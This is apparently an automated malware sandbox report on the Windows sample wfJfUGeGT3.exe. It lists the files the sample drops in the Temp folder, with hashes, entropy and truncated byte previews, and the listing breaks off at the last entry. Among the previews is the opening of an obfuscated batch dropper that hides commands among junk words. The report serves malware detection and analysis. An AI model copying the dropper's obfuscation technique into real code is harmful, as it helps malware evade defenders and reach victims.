SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Competent

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	87040
Entropy (8bit):	7.998110498540301
Encrypted:	true
SSDEEP:	1536:2fV6ysLAsot6A5to2ocZ/3QRI6ySIBORLPcV+MJCP7Jay/R0ulyd0g31RQhc:2wycAsa5jvQRIwV9P3MJCToqLycG
MD5:	D79DDDA7E49B51BB69F59808170A5E63
SHA1:	B791857AE7B920D50F2FC97F0895F289C6A9E8BD
SHA-256:	609B33673BA3698DE21D56BCE0A871D9D96269C7D86BC087419610452675A90E
SHA-512:	4F977BA99B3F88D60380F81EFC0B74BBE4AE29573E0E8CAF0F5899E83F29BE895391FF374A0E557B5BE4EECD241829A442C92FA72F5DDDCB440A45CC4356A157
Malicious:	true
Preview:	K..J...vz..I`..i....D..t.....k7...W.9..r.a.z.\......_..........v.w.Y........'\|.....$...!}.E..er.I.F.#5UA...B7S!u\../R.iU@.TsF.....WJ_6.Kd.f.B}.)t.KqBG0..?.....?&9;...%..o.x...v.P.&+n.5j..^..D.-..%@.w.}..}..?..q.../.>G.S..~..a..U.O...yJ..b..E.%X...../P).....UN".,&..j..%4....o.........zZ.......y,..? ..+.!5S......Q. ..n;........Zw..l...`..r'?..\|.'..Y.J...k..B.zW..no..Rk."....\|.!..N..X h....Gn...A...FRA.\M..@... 1d....N.G.....EPq......i...yX..-&=.........m......G......U.......Qp...WC .0...L..h.q.....k.{.R.....l._oLL..p[....QL5..}.%K.F....K...#$Q,..n.=..\b.3.u:#p..g.ju...,~-'.n..F=...N.%....@/...K.L..r..]S./;.....oQ..a.......-s.`.gB..A....R.SJ...bO<..&\|_..VZ...d(>.2..P.f. <z....H$...Nd(....!\...R.f...[#..Z{e..@j...G.c1...]MX..?..I.:...@.3I&......E..k.5.....E.t;....0.O..\/.L-c....R..\|...jE!....z,.....kM..m.8.!.......j......iS.q.<...CB;].wY2...4Q3.2.-....]:ih....'..c..V..ht.... >?I. .J...C].l...8F..r{S.'..N).P.s.>.......b....Y.6G.P#........

C:\Users\user\AppData\Local\Temp\Corporate

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.997049155940351
Encrypted:	true
SSDEEP:	768:EFzQqu3JDyFgqUKY0iJ+m7L/Z+67tnwlmxbJYMzwExLG//rxJrjRmq2Q04SMtO9O:JegqUKYyiL/Z+6ZwQz38ExUVJ8ZpLw
MD5:	57B8AB1323416077ED8BB346DD2DAA09
SHA1:	43116DAE9716CAF4E7F43943A89E357204C842F8
SHA-256:	1A8D43ECF42D62C9F4DFDAD24C25136A028760A19CF4FD27336BFBB0962426B9
SHA-512:	1899D8CE43C0E18FF3D7EA833680921A717D098FD2C4F8F5DED7007AA31F9946D6895F65364B17BA7DA2F77AFA5EF3782EEFCE562314776BC7FC8B5CB45B1F37
Malicious:	true
Preview:	.,..I<.......b.F.xt......f...jS9..S.e!H...h.:..H.h.......e..h..q....+k....n.?..(..G........e...6..uH\|.d.[.}....B=...y.b.e..o.~e.B.z..............D.a..k...'..:y...^...2.C..6#..Q......U..p..C!.:O..f.V.pG.X /...%"..$...B?.wx.]..8.c...4.\|.BC\`..;.'.iH...P....@.n'....(..w.d.....;..VV..5X...NV..z..'...X...D`.....L..K.{T..~.."..~'.......G/.+...9.BNT.\S..k...%98r....2.@`a....T..1.#f..SY.......;.tL..$pL...D.C..E.....]..s#G(.".'..5...$.\|..px...m4..ij...8xy..&.2...[HS...@.?p6...%:.4#...[.....#%..q..Z$.... om..#.6..=..z4...~;f........(me..y.K.9SF%..n.Ug.......)!jA7.H..8.z....].j.."9...d........s..Sr..."..?.\|QB....F....f.F.d:......$..(.....S.>.C;......Q^iOj.5..}.......Q.i.:RB..8O.H.w..[..!w...}...j...a6.q..+%h[n..mY..5...m~....6..,Q.[.5h.T..K..7LX.a....P...3..a.?.Hq..?....A~4I.\|.,...../...c....+......>M.C..m.\|.$..\|..T.h.s`cc..pi..;.....\.E..".U. .B.\1....ir.N.}...Ob'....f..P..'....X.,.U-...G.60K.....p&F...h7/.H........SQ9.W8......f.@..,.`....P3..

C:\Users\user\AppData\Local\Temp\Entrepreneurs

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	7.997973981352657
Encrypted:	true
SSDEEP:	1536:rIMLTZUD1zCXWdOfnDci2EvLSaB6SPY4DvNn9pEbRJu/dIKRFA6:rI89URzCGqnDrxv23+XD1E9s3Re6
MD5:	1C78EAD3742C95A2C4DF31C8D71E0F1B
SHA1:	A075CCA4D9D8FA5FE3DDBF1F2D6E120208CB5B17
SHA-256:	B25E0F67C38257DBC0AB9A7D6AF8870C878211ABD4E51B8DB52D9C3E2272652D
SHA-512:	09A234D52B31B38A4071078ABDC9A976AA58716A7BA9F1832B84966F039B621044EAAA641FDB2C919FE5334902E4DBAA8E3FD19A638583120F881CDE218B9112
Malicious:	true
Preview:	.._M.......ii.W.X..."2.~#?........-=..l^./....k..%....y.....5k.m.T.n!.....\.[...z...%s7..c.....t....}.UF.x.yHp/s....P8.~...k.%ZpX/o$~e.....=..c..&...f...m....Z...^.....5.}&...v..$./S.y\|.....J.$uJ..<!x..9HW..iS..~...CL!+..F4..G\|r..>f........n.._GZ.^...w..I..y..v.....@.;.c.-3...J;..u..w....\|...2[.C.&'@5>.].)-..D.....]..zT.&.X.....L......?<..D.4...n.V..>.a.$..... .}....SU......_r.'.Y.4y..b.n.8......H..d.n.)....F..p'..W.u&..\|.{E.^_......w]m...yi.\|..R..tS....S......ZR:.v.5...1.....zp.....,..S.OT'A.e.v..."...)"^.g..TK.#t...V...S....Q...3.z.....Yb%r..\]..4..{QhN..?g.2..e...n...T)&..o......qs....[.;U}]..GU......y}..kn..e...SE.ker..8....]......k.\.Eqxu.....J.k...v.7.......].t...a/....l5.N_.m.&..l...HB.Iz,.m..j=.,.#....}..TO.3;...d..Mg...6.O..g.q..w=.z.q<...._Ebk.F...0......s.D.....c.?.Z.... ..$w..)....&..u[w.=......}j?!a.....[..q.*Gh..8...V....~.....P.......dS.P.......nwM,\|.7Q..q.X...E..nE.p(.b.[I...L..Q.>b.."...8Qx/....1...$.cR........v..."p

C:\Users\user\AppData\Local\Temp\Greatest

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.997940176517337
Encrypted:	true
SSDEEP:	1536:rh9fG5c8ghh85Az6ZgnXdrZ4QD9hZtBCyV8qmRfQQ1BXclmgWnS3lpvaww210:bZh85ynXdrPJhQj5X1BIB2SVpvawT6
MD5:	043E35E2330184D548101DFDB638BE96
SHA1:	F73E6F2AF1052B4810820C68F9693E90F6A07D6D
SHA-256:	2D081C4A75403C808336CD690598E765D1277CEA32E3CEA2CB7BC0E62AD35C77
SHA-512:	D764704F01B91644DF122C4EFF4DBA404A46BC436C45F5406509E509213306A0CDED57CBBECA20A6B474C656C294A91E2EA16025B267AF34F4760FC02A8D69C5
Malicious:	true
Preview:	.9".ax^]......`.?...W.........9....o...}>....p.n.=..ge..6..VF.p.P=..?l...j.....M..F../........z..T<.TmWup..A0Yd...W..O.8...D%.S.'\j..(.-...2wpw$.K...d~.0........c~.(.@.......P...]..T.WKf-.8a....%.r+.y...U0.FP@.k............r?......04Y.{8.yG.H.Vi.d%..=a....aM..j..ZH.3.. ..%..k%.....69......O.._.8.)z....Z....b0&..E2....\Z..G.m.....n.NB..Q.H.Th.....e...{...)...H.b.<{\|.o.....A(...../.m;..t.j...<L(.XL...m.. ...R.VA'../?....HF.g...Z.\|...]...D1...8t.W..T........i..}.z...h$.XF~8n+..6....N......T.X./...l#...z.N...q..8.A...!...&>.Ur..{.......k....K...........c_.&.C.(f-.\|F2..ap...~.O.........b...BJ6...9,.9W...}...8...]..U..$.9.....@...@NV..>.[p;T..$.l`_a..k....e..?z...Z./../.g..B./..H..z...(......F.G....n...k L"b#W...!.I..;.F.B.r..1.qY2..c.e......P...W,....&.T.xj..0k.W...4....v...G.".N:....2t.R'[...Y.n!.m[_..A%...-...tV..5...K.K ..Xb......D\|.1.E....5.G...b......Z...e.......<{.......55....j...Ga,.g..)...........Z.HD%v......=..A.ys..

C:\Users\user\AppData\Local\Temp\Honda

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	ASCII text, with very long lines (574), with CRLF line terminators
Category:	dropped
Size (bytes):	12305
Entropy (8bit):	5.0949681487880785
Encrypted:	false
SSDEEP:	384:5xhQAQODXaKbsPsE7B7lZstjTicMXKtVt:TJQODXa4MBrUGXKtb
MD5:	CEF464062B7E5B404539D0C443917907
SHA1:	01802C968D8917FAB13D71BFE4ED62E36E965745
SHA-256:	5C1046EA8E740FAAAF01E2818EBF5CEA15D398594A26B8BB76E8B3DA6DBD1BBA
SHA-512:	A5E335A7BE3BC40B5DD30E40813BAE8CD51761C2BFB8D4E2B6AD067CF8DD429AEC85AD70534780DE6D8FA8E996F310FB3D73334C83EB6EC92816C497C303E6B5
Malicious:	false
Preview:	Set Ks=o..HKGlobal Michael Jane ..sxUIncome Moms Affiliated Educated Controversial Habits Slot Insurance April ..jfTManually ..KLhSuspended Housing Screening ..gJyyLightning Marks Raises Functional Diet Indigenous ..pnUnavailable Gi ..nIGrey General Furniture Agencies ..KFuIAdoption ..Set Scholar=p..AgSharon Lynn Accept Lived Underground Orange Milf ..djBStill Specializing Walnut ..zURelying Baking Podcasts ..WELoFifth Understood Inspiration Pound ..IkWTaken Interested Reset Shares Nudist Picture ..tPPArbitrary Pierre Tabs ..Set Butt=g..HuLTt ..nuGenerates ..RJlFInstitute ..cCWActive Factors Sticks Sept Told ..zJesBlvd Accommodation Bit Converted Necessary ..jfJCPromising Default Boxes ..Set Nylon=v..lxPatrol Notify Component Burning Grave Crew Cad ..CMExists Impossible Fri Mpeg ..ARManor Companies Diving Discs Trouble Ray Originally Objects ..fhznOutdoor Sophisticated Knowledgestorm Singles Weight Shorter Gardens ..WMWiDirectories Surround Logo Holds Caused Complete Film Staffing Link

C:\Users\user\AppData\Local\Temp\Honda.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (574), with CRLF line terminators
Category:	dropped
Size (bytes):	12305
Entropy (8bit):	5.0949681487880785
Encrypted:	false
SSDEEP:	384:5xhQAQODXaKbsPsE7B7lZstjTicMXKtVt:TJQODXa4MBrUGXKtb
MD5:	CEF464062B7E5B404539D0C443917907
SHA1:	01802C968D8917FAB13D71BFE4ED62E36E965745
SHA-256:	5C1046EA8E740FAAAF01E2818EBF5CEA15D398594A26B8BB76E8B3DA6DBD1BBA
SHA-512:	A5E335A7BE3BC40B5DD30E40813BAE8CD51761C2BFB8D4E2B6AD067CF8DD429AEC85AD70534780DE6D8FA8E996F310FB3D73334C83EB6EC92816C497C303E6B5
Malicious:	false
Preview:	Set Ks=o..HKGlobal Michael Jane ..sxUIncome Moms Affiliated Educated Controversial Habits Slot Insurance April ..jfTManually ..KLhSuspended Housing Screening ..gJyyLightning Marks Raises Functional Diet Indigenous ..pnUnavailable Gi ..nIGrey General Furniture Agencies ..KFuIAdoption ..Set Scholar=p..AgSharon Lynn Accept Lived Underground Orange Milf ..djBStill Specializing Walnut ..zURelying Baking Podcasts ..WELoFifth Understood Inspiration Pound ..IkWTaken Interested Reset Shares Nudist Picture ..tPPArbitrary Pierre Tabs ..Set Butt=g..HuLTt ..nuGenerates ..RJlFInstitute ..cCWActive Factors Sticks Sept Told ..zJesBlvd Accommodation Bit Converted Necessary ..jfJCPromising Default Boxes ..Set Nylon=v..lxPatrol Notify Component Burning Grave Crew Cad ..CMExists Impossible Fri Mpeg ..ARManor Companies Diving Discs Trouble Ray Originally Objects ..fhznOutdoor Sophisticated Knowledgestorm Singles Weight Shorter Gardens ..WMWiDirectories Surround Logo Holds Caused Complete Film Staffing Link

C:\Users\user\AppData\Local\Temp\Itsa

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	868
Entropy (8bit):	3.5548026049869303
Encrypted:	false
SSDEEP:	12:OyGSGCbTQxbs/0pQHPZdsLq6h1b5zGbWCBl9dte4:OyGSnPQxqtPMLqCj8WCBl9dte4
MD5:	20CA365E882B4C4A95B110E62F8A4C08
SHA1:	662E9B589D89DE106713F361D8B2536740554785
SHA-256:	2739A9B72A38C08A6385701C6BAFEB7FDD7FAE8B33ACE80732EC934EC8518C6C
SHA-512:	9682A8935932673B2C1C5FDA831C5B1E53219DBD74DBF96E483CDEC68DB6B31A69D714F6257C62A708BF0B6A2773F5F01EFC86CB54FCC084341A862ED6E4D6FB
Malicious:	false
Preview:	BachelorRayPotentialBeats..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.................................................................................................................

C:\Users\user\AppData\Local\Temp\Provides

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.997608168843038
Encrypted:	true
SSDEEP:	1536:YTpO3XWfDyw7a9utGvuEpqKw7NmLFd6oQbQbsbLvisrIl/xbH48kVGboiW:YPfOwOutGGEpqd7Gd6/bQbILv5rC/xL6
MD5:	72DCAD57E5699DC20CB41F6AE4ACD115
SHA1:	CB7E6842F24319262605EA2C1BF3A7EAE60358AF
SHA-256:	945D570376B997851FD74131BCF117AAD625341FCB7B756409E7CB711632CB0C
SHA-512:	5F251F25514D5D138D20B308C2C162DAF9520DDE28F25379D09ACAF1F2FC67BCF9A3BFA62A42D83C19FEBFD28809E82561AA2B19614735037930964D1AA18AFD
Malicious:	true
Preview:	/..a..."x.9....7M..-.Pf.GS.nR. ...]?.qI...!...(..i}.......-....$c^.{........d...yZw=:...^D....SA..s.o...y.A...G...].k.#..p......5]......,Q..w....n{.7...T...).,1.O_`...[...R^ W..3...+.....U.f$...2g............Z<...jD.J..d.C..<..t#8.Go....$...{.I .f\.........P[.0..ad.}... P......!do.y..M.[].Z`~....{&...&...}.f..Y........+9!.".^GE4"BH...=.O...~k...s}\|.A.'0.>.....c=.p.X..8...;0....q.WQ..^y.A.....F8.`^Y...Z.....2.x.p.8e..UD...b...<..V..;"............_..S.hP4....v.<L.Z....mi7.. ..o..".\|. ....{1H.+S.....F.r..I...#..L..>_..M..@..H`...@.N#..z..Z.....J......H.2f...%._Smv.p.......,-.ef8......=...+./~.\|......).....=..M"...._>.Z.......y.l.h...6..#.'.N9.-...B..OG.<..:k....'.#Q....mV].Rf."9".._jm.....?.cX.........E}......g.n.....e..(...UU..8@),...n.bj, .u......ew\|.;/..R.l..u;......\|.U'\....=.o.p_..$..b..=.../a.Uv7M...p..~`.X...C.G....Ljs.s.;...y..M.:..lUi.d..,.Kk.(..Cq.V......."Q.^.W..V...v.;._Sg\Y:..........)Y.Z..cC-.......~.....o...3.>E7..D.@2.&JV.

C:\Users\user\AppData\Local\Temp\Reveal

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	7.997896408510753
Encrypted:	true
SSDEEP:	1536:L1lLilX3YfWBMdU67iXs7D2VtQZzraEA4cA19fx0+bnGiI6CJBKA/7J/fR3Wg:LXuVYwMdU6Vu8zLbcAjffzvITBfR
MD5:	D6A091E43DB1334C92A9163FB999AA13
SHA1:	380674ED8D23C1EC2F9A5F5B0167970B296772A7
SHA-256:	2299A0DF735B5C6A171DDD6A1B009756C19EC3BB1383BEF34BCA8FA7F4A6CF09
SHA-512:	4142FC9995B083BC2D3D9B5C2789EA564117ED0EDE14A1AA510E9B32B8FDCD149350CE8069EC168141E720D4FFAA246BC7A4585FDFF4466343CA3F4D206719F8
Malicious:	true
Preview:	..t.^.% ...s...6..^.WIB.d.."..q.....;;N....tS....U..4.rI..L....V....%#{.?....'.....e...5.....Z../...d!U..q.H.3R.].lJr......I.q...j..(a..H.T].k.....Bc...+.*..@A>..../@..@2..,D.......a......]IG,.S......S.\|-$.\..0[.'.'...p'....y..ZhD.......X....'....e..8........'..1e.1.h...3!..@?.P.Lz.t.(..I..........N.....Q%..........l.............^B.~5)u.Z.A.=zO....8.M...s..5....~z.z..[..f.......R...+}.?.p...K.S.Y.%...E^+`..e.U..9.(.....c4Y.+.....?...=.W.....]m..O.R.....Vx.k...<.N,[...i:]...c.....bA7.....N..."....;.h.om?...>..]..G>./$..>....1?.M_4D..Z.@ykX!.A.`7..rxs$..Vr..T..4-....F.H...6@\.k...^;Ie..........R..\|...Z...>.0.k6gDD..%...............u......H..m.`......c.6....;<z..N.m..#..;5..5m>..:.)...m.E........J.FyK{@`.}^o.O..^....g.j./.w..>.~..1.=^.lQ5.LR.l.U.[+.\|2E.Fc.njaVW.3..-?.JW.......t>Z.X3.K.a...@.....X..59..v.^....L..J5$.,.e.LA9.`.=.{V..X. .....$.....(...C...c.djF....'.....TNp...5]$'..?H.(j68.c;T....Ro..$>..E..w.D..-.@...}..%.6w.

C:\Users\user\AppData\Local\Temp\Scottish

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	892767
Entropy (8bit):	6.621907056901829
Encrypted:	false
SSDEEP:	12288:vpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:vTxz1JMyyzlohMf1tN70aw8501
MD5:	EA1CFAD1B98DA498ADDAD255609D0E5F
SHA1:	14FA7E96806624330A8899B215550122AEB94C91
SHA-256:	DA224EA0C81FD05189621037F4F0B856F47DD1FB0841D4142395F638DA7EB802
SHA-512:	EDE7FA0FC6922366DD7319BDC0A00AF36B39D506EE246A18D66641374A04727318ABDC8832944995C4374487515B38017A081FFBFA17F566B1C83FAC59E39442
Malicious:	false
Preview:	........................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F\|U............[...U......Ky......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..QQ.E....I.Pj.hD.I..............f.}.1.....].U..QQ.}..SVtr.u...tk3.3.f...E.Pj.SRQ....I...uQ.E.W.<..E..}.PVSS.u..u... .I...u..E...E.;E.s.3.f..F...u.....I..._^[..].3.f.D7...2...U..SV..j.[.F.9F.u0...j.X;.sL3.F...W......

C:\Users\user\AppData\Local\Temp\Screw

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	7.997177526469974
Encrypted:	true
SSDEEP:	1536:YyWwUSme91qs+wl3fncHWq54NBb1ImVq80aoQXsmoRwmYEa+xRHoBgW:nPdxqsH302q547xImVq80jRnyWugW
MD5:	5FC7641883018EDBF0EAD49AF5EC3CBC
SHA1:	B021E03764AA36D5B5176AB9DBD825001D9797C8
SHA-256:	419E973C6E735BBA8B60704A962E0B79D285E7A09CB317AEFAB1ED001A1BF344
SHA-512:	698C1EE8137077116160E8958DAABED29DA1BFC2C9CE9795A5242FBD8A61FD2D425AA5722542D60F8DF15C2AF19A3ECB4A7D3628C9FDBF40F46A37769647EADE
Malicious:	true
Preview:	...A.x.1..y.d.RBw?...\.t.4.t4.M..0..#.}._.!LF.W..".0v>..g._w=;.W+.y.,_]..=....w.W...b...Q.C...........&.Gl..`L...@'...u...6......XM.T8w@.1....wd.=...o..7..gz.Hr....y.._.4o.I.j..uzi..8y1)..-....iR..'tX...B...rx...>.q..K...1......CP.....:...#.Z..<.}. )..%..!......r..>.4S%o..a....O.i....>W.;.r7.+........>.......R.........K(LA/./../P+..GF0..lJ...R.81...#e..V......>.H....P.....V...;0...\...GQ..D.h.d.}.:..r.h-1..@..R.....U\|.W....MjK....ah.u..E.sm.........m....j....4.t....8........Cm,o..~.f..i.E.1...SNNL.:]..B.....>......O......P.5...S).cz.+....!.1.+.Q....8.)..6...VH..E&...1ro..-T._e.k{.z6Tc...DQ..};.e....^..F.8...a.nd.,u...$*...M.r...." .+..[..x....o.7.-+.#O&v~0..V~.....\....w,.).......Vd.T...d....[A.tV!../..\|...5...L...-+.9X....).;.>.w3.JMI?........f.MDA.#..P.E9..wU..6.k..9.............W...Zr.Jvc..D..,.iX....;h?:%.O67.4E~.i:]2....y..H...Y.....q..x....T.5...T....h.l{.;......Rk..A......5.r.+.%9.}.[B?...a..P[.4..F%....[a...Y2T.r......%w..N...

C:\Users\user\AppData\Local\Temp\Still

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	7.997706963404338
Encrypted:	true
SSDEEP:	1536:KlyC1ycjURzts3v4p/Kqm36vqVBvybzERtSb+ERRG7XZhY+RCtw6nSWbj:ayCcts3dN6yVZybAL+3RM7XExteWbj
MD5:	5737221E4786A16DB1D00B526A889913
SHA1:	B44EF92D0F12E91E236F96359FA3667C773703AB
SHA-256:	743304691772B7F4B1254B7EC4DEFE408ABD5380C260906FF5D51018CC51C7F4
SHA-512:	0B3219FF89BD5F80AA83682C6193C8F540058262231F343AB11EBCCB7849CF45B1B2850494150522479735304CD255E4BC25C1BD76A42F7482E43A3F60D000EF
Malicious:	true
Preview:	......9.....x.]Ky.D~.7.K.....A._v.7..QG.x.O..{S.........A......%.-L.....1..dQl..Z9.ed.7X?.52<...R.F......&...j>.-........d.m..K3W.@....8........[.w>9L.&1H.qn....\.m.Xr..Z...g'`}.6........7^..Vl).........Af3V..9...0./..+..3.xM....C.......}/5..>......5'...5...@kR?.............p..%.m.%....W...~.......O..k....'.w.4.t....N...%.!9s.P..&.....n.../f...".....A.......:..B..O.\f.i.}.q...H.V.`...c...r/<7-J.X/........._.f............=.......r...R.^>.b.._'.i.phl..V.cR$d.[....E..60iZqx8f.....O....d.0......W..W.&..;...\|....d..$..j?.Rz..\.....h.V.....eO..#Wc...1m...X.].f..R$..L=!.3..I.J+.b{.k .YKLN....#.:v....\.q.2..:..z.].\|o..Ug..c.....#>..^......?BA?."!.}.........z...^..5.h..a..0._.R..K>......:..S".1...T.H7Nduu....yA.8.&@J.Y.>..B3.?.....&..F....5.P.D..&......K...\.<#.p..=.Q.B..]....7...K.T..~A.......H)`.WU...Cc_......3I.0...u.>y...]rK+.u...{.....N..I%.....?....!..Q...3. B.CaO.Xw#".s.~.,.g...c8..Y......e}q?....UO=.........i.\|...p.._.U.d..T..]..mk}.4.xV`..

C:\Users\user\AppData\Local\Temp\Tmp1486.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Tmp14D5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Whom

Download File

Process:	C:\Users\user\Desktop\wfJfUGeGT3.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.997347802965752
Encrypted:	true
SSDEEP:	1536:AZcxT5PMfnoT5IAyrEBysFZAken7iV0myzZMJMqNW:AGXkoTCAxBysFDen7I0mKZMXc
MD5:	CF18A7ED11645523ADDBD2FBB31B014D
SHA1:	09CAF4ED6B6822E838D3512CE5A75E4125192C5F
SHA-256:	27DBF0E6F006AE0F7FA94CD33287E7F3AB85E1FA637636EFF8E94EB649E45990
SHA-512:	F1CFC3FBACCFCD199B99AC647A2A0F76A05A7DB1B655FA2E9DE44DEF1630BEBBFDBBD814225664F2D7D7015FF73B87C02242BEC5105460459694F03E836F0D56
Malicious:	true
